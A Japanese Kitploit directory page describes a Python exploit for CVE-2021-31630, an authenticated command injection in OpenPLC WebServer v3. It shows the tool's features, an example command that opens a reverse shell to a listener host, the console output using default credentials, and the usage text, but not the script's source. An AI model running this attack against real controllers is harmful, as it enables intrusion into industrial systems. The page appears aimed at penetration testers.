Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-31630 — Open PLC Webserver v3におけるコマンドインジェクションを悪用するためのPythonスクリプト | Kitploit
ツール/GitHubGitHub/thewhiteh4t/cve-2021-31630
脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツールペイロード開発
GitHubthewhiteh4t/cve-2021-31630

cve-2021-31630

Open PLC Webserver v3におけるコマンドインジェクションを悪用するためのPythonスクリプト

リポジトリを見る
21432年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

cve-2021-31630

OpenPLC WebServer v3 - 認証済みRCE

このPoCスクリプトは、Fellipe Oliveira が提供するエクスプロイトに基づいています。

特徴 :

  • st ファイルアップロードの代わりに、Cコードを /hardware に直接アップロード
  • リバースシェルをアップロードする前にデフォルトプログラムを復元
  • 非ブロッキングな改良版Cベースのリバースシェルにより、Webサーバーがハングしません ;)
  • バックグラウンドでシェルを起動し、PLC停止後も exit するまで動作します
  • クリーンアップ
root@kitploit:~
$ python cve_2021_31630.py -lh 10.10.16.68 -lp 4444 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------

[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 20 secs
[>] LHOST    : 10.10.16.68
[>] LPORT    : 4444

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!

依存関係

root@kitploit:~
pip3 install requests

使用方法

root@kitploit:~
usage: cve_2021_31630.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         ターゲットURL(http(s)://付き)

options:
  -h, --help  このヘルプメッセージを表示して終了
  -u U        ユーザー名
  -p P        パスワード
  -t T        リクエストタイムアウト(サーバーが遅い場合は増やす)
  -lh LH      LHOST
  -lp LP      LPORT
ツールをダウンロード